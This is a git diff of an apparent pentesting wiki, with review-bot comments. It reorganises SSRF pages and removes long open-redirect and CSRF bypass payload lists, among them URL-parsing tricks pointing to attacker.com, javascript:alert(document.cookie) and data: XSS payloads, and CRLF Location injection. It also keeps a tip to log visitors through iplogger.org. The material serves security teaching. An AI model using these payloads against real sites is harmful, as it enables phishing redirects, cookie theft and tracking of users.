diff --git a/.gitbook/assets/image (649) (1).png b/.gitbook/assets/image (649) (1).png
new file mode 100644
index 000000000..1e2588800
Binary files /dev/null and b/.gitbook/assets/image (649) (1).png differ
diff --git a/.gitbook/assets/image (649).png b/.gitbook/assets/image (649).png
index 1e2588800..0ebce7d02 100644
Binary files a/.gitbook/assets/image (649).png and b/.gitbook/assets/image (649).png differ
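Review bot: the new `image (649) (1).png` (index 000000000..1e2588800) carries exactly the blob that `image (649).png` held before this change (1e2588800..0ebce7d02), so this is a copy-then-overwrite rather than a rename. Only http-response-smuggling-desync.md is repointed to the `(1)` copy further down, and no visible hunk references the new content of `image (649).png`; confirm which page is meant to show the replaced picture, and consider a descriptive file name instead of the GitBook auto-suffix so the two images are not confused again.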
diff --git a/SUMMARY.md b/SUMMARY.md
index ef3413deb..9aaca37e0 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -438,7 +438,10 @@
* [Mysql SSRF](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
* [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap/README.md)
* [Second Order Injection - SQLMap](pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md)
-* [SSRF (Server Side Request Forgery)](pentesting-web/ssrf-server-side-request-forgery.md)
+* [SSRF (Server Side Request Forgery)](pentesting-web/ssrf-server-side-request-forgery/README.md)
+ * [URL Format Bypass](pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md)
+ * [SSRF Vulnerable Platforms](pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md)
+ * [Cloud SSRF](pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md)
* [SSTI (Server Side Template Injection)](pentesting-web/ssti-server-side-template-injection/README.md)
* [EL - Expression Language](pentesting-web/ssti-server-side-template-injection/el-expression-language.md)
* [Reverse Tab Nabbing](pentesting-web/reverse-tab-nabbing.md)
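Review bot: the four new entries point at `pentesting-web/ssrf-server-side-request-forgery/README.md`, `url-format-bypass.md`, `ssrf-vulnerable-platforms.md` and `cloud-ssrf.md`, but none of those files is added anywhere in this diff (the old single page is only deleted below), so as submitted these are dangling summary links; the new pages must land in the same commit. While touching this block, `Cheetsheat` on the SQLMap line is a typo for `Cheatsheet`.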
diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md
index f01c09a40..d72b583a4 100644
--- a/cloud-security/gcp-security/README.md
+++ b/cloud-security/gcp-security/README.md
@@ -280,7 +280,7 @@ Supposing that you have compromised a VM in GCP, there are some **GCP privileges
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
-If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery.md#6440).
+If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440).
## Cloud privilege escalation
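Review bot: the rewritten link keeps the opaque `#6440` fragment when pointing at the new directory; since the SSRF page is being split and the summary adds a dedicated `cloud-ssrf.md` sub-page, that anchor is unlikely to still resolve on the new README. Link to the cloud SSRF page directly (e.g. `../../pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md`) with a readable heading anchor, or drop the fragment.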
@@ -368,8 +368,6 @@ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
-
-
### Service account impersonation
Impersonating a service account can be very useful to **obtain new and better privileges**.
@@ -377,7 +375,7 @@ Impersonating a service account can be very useful to **obtain new and better pr
There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating\_a\_service\_account):
* Authentication **using RSA private keys** (covered [above](./#bypassing-access-scopes))
-* Authorization **using Cloud IAM policies** (covered [here](broken-reference))
+* Authorization **using Cloud IAM policies** (covered [here](broken-reference/))
* **Deploying jobs on GCP services** (more applicable to the compromise of a user account)
### Granting access to management console
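Review bot: changing `broken-reference` to `broken-reference/` does not repair anything; `broken-reference` is the placeholder GitBook leaves behind when a link target no longer exists, so the "covered here" bullet for IAM-policy impersonation still points nowhere. Replace it with the real section that covers authorization via Cloud IAM policies (on this page or the service-account page), or remove the parenthetical until that section exists.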
@@ -398,7 +396,7 @@ This is the **highest level you can assign using the gcloud tool**.
### Spreading to Workspace via domain-wide delegation of authority
-[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
+[**Workspace**](https://gsuite.google.com) is Google's c**ollaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
**Service accounts** in GCP can be granted the **rights to programatically access user data** in Workspace by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like **reading** **email** in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization.
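Review bot: the Workspace line is touched for whitespace only but still carries broken emphasis: `c**ollaboration and productivity platform**` opens the bold after the first letter, so it renders as "c" followed by bold "ollaboration…". Since the line is already in the diff, make it `**collaboration and productivity platform**`. In the context line, `programatically` should be `programmatically`, and `GMail` is written `Gmail` earlier in the same paragraph.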
@@ -446,10 +444,10 @@ If you have success creating a new admin account, you can log on to the [Google
Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services:
{% hint style="info" %}
-Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource).
+Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource).
{% endhint %}
-There is a gcloud API endpoint that aims to **list all the resources the accessible from the used user accoun**t, it's in alpha bet and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/)
+There is a gcloud API endpoint that aims to **list all the resources the accessible from the used user accoun**t, it's in alpha bet and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/)
{% content-ref url="gcp-buckets-enumeration.md" %}
[gcp-buckets-enumeration.md](gcp-buckets-enumeration.md)
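Review bot: the `+` version of the gcloud alpha sentence keeps the pre-existing wording defects: "list all the resources the accessible from the used user accoun**t" (stray "the", bold closing mid-word) and "alpha bet" for "alpha". Suggested: "There is a gcloud API endpoint that aims to **list all the resources accessible from the current user account**; it is in alpha and only supports a couple of resources, …". The hint-line change is whitespace only and can be dropped to keep the diff focused.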
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index dd85294c9..8831747ee 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -120,19 +120,9 @@ Some applications validate the Referer header when it is present in requests but
#### Regexp bypasses
-```
-https://hahwul.com (O)
-https://hahwul.com?white_domain_com (O)
-https://hahwul.com;white_domain_com (O)
-https://hahwul.com/white_domain_com/../target.file (O)
-https://white_domain_com.hahwul.com (O)
-https://hahwulwhite_domain_com (O)
-file://123.white_domain_com (X)
-https://white_domain_com@hahwul.com (X)
-https://hahwul.com#white_domain_com (X)
-https://hahwul.com\.white_domain_com (X)
-https://hahwul.com/.white_domain_com (X)
-```
+{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
+[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
+{% endcontent-ref %}
To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do:
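Review bot: the removed list is specific to the Referer regexp check (each line is annotated (O)/(X) for whether it passed the filter), yet it is replaced by a content-ref to a generic URL-format-bypass page that is not in this diff; confirm the new page keeps those outcome annotations, otherwise the test results are lost. With the list gone, `#### Regexp bypasses` introduces nothing but a cross-reference; a one-line sentence noting that the Referer is matched as a URL and the same parsing tricks apply would keep the section self-explanatory.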
diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md
index bb6b3bd30..4dd9e00f3 100644
--- a/pentesting-web/file-upload/README.md
+++ b/pentesting-web/file-upload/README.md
@@ -139,10 +139,10 @@ Note that **another option** you may be thinking of to bypass this check is to m
* [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
* [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
* [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
-* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
+* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
* [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
* Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
-* Upload the **\*\*\[**eicar**]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\*
+* Upload the **\*\*\[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\*
* Check if there is any **size limit** uploading files
Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
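Review bot: the eicar bullet (changed line) is still broken markdown: `**\*\*\[eicar]\(**…**) content … antivirus\*\*` mixes escaped and unescaped asterisks, so it renders as literal `**[eicar](` text rather than a link. Rewrite it as `* Upload the [**eicar**](https://secure.eicar.org/eicar.com.txt) content to check if the server has any **antivirus**`. The SSRF link change itself is fine, since the directory path resolves to its README.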
@@ -189,7 +189,7 @@ The decompressed files will be created in unexpected folders.
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
-An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)****
+An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)\*\*\*\*
```python
python2 evilarc.py -h
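Review bot: the `****` after the evilarc link is leftover emphasis with no content; escaping it to `\*\*\*\*` just makes four literal asterisks visible. Delete the trailing asterisks instead. In the context below, the fence is tagged `python` but holds a shell command (`python2 evilarc.py -h`); `bash` is the right tag.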
diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md
index 83760a614..e8aae8a46 100644
--- a/pentesting-web/http-response-smuggling-desync.md
+++ b/pentesting-web/http-response-smuggling-desync.md
@@ -112,7 +112,7 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
He will send a **exploit** like:
-![](<../.gitbook/assets/image (649).png>)
+![](<../.gitbook/assets/image (649) (1).png>)
After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
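Review bot: swapping the image to `image (649) (1).png` matches the binary changes at the top of this diff (the `(1)` file carries the blob `image (649).png` had before), so this page keeps its previous picture while `image (649).png` receives new content that nothing else in the diff references; state which page the new content is for. In the context lines, "a **exploit**" should be "an **exploit**" and "victims request" should be "victim's request".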
diff --git a/pentesting-web/open-redirect.md b/pentesting-web/open-redirect.md
index 0f9a2baac..cfee13a2d 100644
--- a/pentesting-web/open-redirect.md
+++ b/pentesting-web/open-redirect.md
@@ -2,123 +2,11 @@
## Open redirect
-### Exploitation
+### Redirect to localhost or arbitrary domains
-Using a whitelisted domain or keyword
-
-```
-www.whitelisted.com.evil.com redirect to evil.com
-https://www.target01.com//example.com/ redirect to //example.com/
-https://www.target01.com%09.example.com redirect to example.com
-https://www.target01.com%252e.example.com redirect to example.com
-```
-
-Using "//" to bypass "http" blacklisted keyword
-
-```
-//google.com
-```
-
-Using "https:" to bypass "//" blacklisted keyword
-
-```
-https:google.com
-```
-
-Using "//" to bypass "//" blacklisted keyword (Browsers see // as //)
-
-```
-\/\/google.com/
-/\/google.com/
-```
-
-Using "/\\" to bypass:
-
-```
-/\google.com
-```
-
-Using "%E3%80%82" to bypass "." blacklisted character
-
-```
-//google%E3%80%82com
-```
-
-Using null byte "%00" to bypass blacklist filter
-
-```
-//google%00.com
-```
-
-Using parameter pollution
-
-```
-?next=whitelisted.com&next=google.com
-```
-
-Using "@" character, browser will redirect to anything after the "@"
-
-```
-http://www.theirsite.com@yoursite.com/
-```
-
-Creating folder as their domain
-
-```
-http://www.yoursite.com/http://www.theirsite.com/
-http://www.yoursite.com/folder/www.folder.com
-```
-
-XSS from Open URL - If it's in a JS variable
-
-```
-";alert(0);//
-```
-
-XSS from data:// wrapper
-
-```
-http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
-```
-
-Username
-
-```php
-https://www.victim.com@attacker.com
-https://www.victim.co%6D@attacker.com
-https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
-```
-
-IP formats
-
-```php
-216.58.215.78 -- Regular
-3627734862 -- Decimal
-0330.0072.0327.0116 -- Octal
-00000330.00000072.00000327.00000116 -- Octal with junk zeros
-0xd83ad74e -- Hex
-0xd8.0x3a.0xd7.0x4e -- Hex (dot sepparated)
-0x000000d8.0x0000003a.0x000000d7.0x0000004e -- Hex (dot sepparated) with junk zeros
-```
-
-You can also mix the different IP formats:
-
-![](<../.gitbook/assets/image (503).png>)
-
-You can play with the different IP formats in [https://www.silisoftware.com/tools/ipconverter.php](https://www.silisoftware.com/tools/ipconverter.php)
-
-Parsing
-
-```
-http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
-List:
-① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
-⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
-⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
-⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
-Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
-ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
-```
+{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
+[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
+{% endcontent-ref %}
### Open Redirect to XSS
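Review bot: besides host-format tricks, the removed block contained material that is not a URL-format bypass and has no home in the `url-format-bypass.md` content-ref: the "XSS from Open URL - If it's in a JS variable" payload, the `data:` wrapper example, the parameter-pollution trick (`?next=whitelisted.com&next=google.com`), and the `image (503).png` IP-format screenshot. Move the JS-variable and `data:` items into the `### Open Redirect to XSS` section just below, keep parameter pollution under this heading, and either keep the screenshot or delete the now-unreferenced asset. The new heading `Redirect to localhost or arbitrary domains` also reads oddly above nothing but a cross-reference; one sentence saying the redirect parameter is parsed as a URL and therefore shares the SSRF host-parsing bypasses would make the section stand on its own.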
@@ -162,502 +50,7 @@ javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
-```
-
-### More domain bypasses
-
-```
-<>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-/〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-\/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
-%01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-%01https://google.com
-////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-////%09/google.com
-///%09/google.com
-//%09/google.com
-/%09/google.com
-////%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-///%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/%09/whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-////%09/whitelisted.com@google.com
-///%09/whitelisted.com@google.com
-//%09/whitelisted.com@google.com
-/%09/whitelisted.com@google.com
-&%0d%0a1Location:https://google.com
-\152\141\166\141\163\143\162\151\160\164\072alert(1)
-%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
-////216.58.214.206
-///216.58.214.206
-//216.58.214.206
-/\216.58.214.206
-/216.58.214.206
-216.58.214.206
-////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
-////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
-////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
-%2f216.58.214.206//
-%2f216.58.214.206
-%2f216.58.214.206%2f%2f
-////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
-//%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-%2f$2f216.58.214.206
-$2f%2f216.58.214.206%2f%2f
-%2f$2f3627734734
-$2f%2f3627734734%2f%2f
-//%2f%2fgoogle.com
-/%2f%2fgoogle.com
-$2f%2fgoogle.com
-%2f$2fgoogle.com
-$2f%2fgoogle.com%2f%2f
-%2f3627734734//
-%2f3627734734
-%2f3627734734%2f%2f
-/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
-/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
-%2fgoogle.com//
-%2fgoogle.com
-%2fgoogle.com%2f%2f
-////3627734734
-///3627734734
-//3627734734
-/\3627734734
-/3627734734
-3627734734
-//3H6k7lIAiqjfNeN@whitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//3H6k7lIAiqjfNeN@whitelisted.com+@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
-//3H6k7lIAiqjfNeN@whitelisted.com@google.com/
-//3H6k7lIAiqjfNeN@whitelisted.com+@google.com/
-////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-////%5cgoogle.com
-///%5cgoogle.com
-//%5cgoogle.com
-/%5cgoogle.com
-////%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-///%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-//%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/%5cwhitelisted.com@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-////%5cwhitelisted.com@google.com
-///%5cwhitelisted.com@google.com
-//%5cwhitelisted.com@google.com
-/%5cwhitelisted.com@google.com
-/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
-%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
-%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80?@whitelisted.com/
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@whitelisted.com/
";alert(0);//
-data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
-data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
-data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
-data:whitelisted.com;text/html;charset=UTF-8,
-//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
-//google%00.com
-/\google%252ecom
-google%252ecom
-<>//google.com
-/<>//google.com
-//;@google.com
-///;@google.com
-/////google.com/
-/////google.com
-////\;@google.com
-////google.com//
-////google.com/
-////google.com
-///\;@google.com
-///google.com//
-///google.com/
-///google.com
-//\/google.com/
-//\google.com
-//google.com//
-//google.com/
-//google.com
-/.google.com
-/\/\/google.com/
-/\/google.com/
-/\/google.com
-/\google.com
-/〱google.com
-/google.com
-../google.com
-.google.com
-@google.com
-\/\/google.com/
-〱google.com
-google.com
-google.com%23@whitelisted.com
-////google.com/%2e%2e
-///google.com/%2e%2e
-//google.com/%2e%2e
-/google.com/%2e%2e
-//google.com/%2E%2E
-////google.com/%2e%2e%2f
-///google.com/%2e%2e%2f
-//google.com/%2e%2e%2f
-////google.com/%2f..
-///google.com/%2f..
-//google.com/%2f..
-//google.com/%2F..
-/google.com/%2F..
-////google.com/%2f%2e%2e
-///google.com/%2f%2e%2e
-//google.com/%2f%2e%2e
-/google.com/%2f%2e%2e
-//google.com//%2F%2E%2E
-//google.com:80?@whitelisted.com/
-//google.com:80#@whitelisted.com/
-google.com/.jpg
-//google.com\twhitelisted.com/
-//google.com/whitelisted.com
-//google.com\@whitelisted.com
-google.com/whitelisted.com
-//google%E3%80%82com
-/http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-/http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-http://;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-http://.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-http:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-http://00330.00072.0000326.00000316
-http:00330.00072.0000326.00000316
-http://00330.0x3a.54990
-http:00330.0x3a.54990
-http://00330.3856078
-http:00330.3856078
-http://0330.072.0326.0316
-http:0330.072.0326.0316
-http:%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
-http:%0a%0dgoogle.com
-http://0xd8.072.54990
-http:0xd8.072.54990
-http://0xd8.0x3a.0xd6.0xce
-http:0xd8.0x3a.0xd6.0xce
-http://0xd8.3856078
-http:0xd8.3856078
-http://0xd83ad6ce
-http:0xd83ad6ce
-http://[::216.58.214.206]
-http:[::216.58.214.206]
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.whitelisted.com/
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.whitelisted.com/
-http://3627734734
-http:3627734734
-http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.whitelisted.com/
-http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
-http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
-http://3H6k7lIAiqjfNeN@00330.0x3a.54990
-http:3H6k7lIAiqjfNeN@00330.0x3a.54990
-http://3H6k7lIAiqjfNeN@00330.3856078
-http:3H6k7lIAiqjfNeN@00330.3856078
-http://3H6k7lIAiqjfNeN@0330.072.0326.0316
-http:3H6k7lIAiqjfNeN@0330.072.0326.0316
-http://3H6k7lIAiqjfNeN@0xd8.072.54990
-http:3H6k7lIAiqjfNeN@0xd8.072.54990
-http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
-http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
-http://3H6k7lIAiqjfNeN@0xd8.3856078
-http:3H6k7lIAiqjfNeN@0xd8.3856078
-http://3H6k7lIAiqjfNeN@0xd83ad6ce
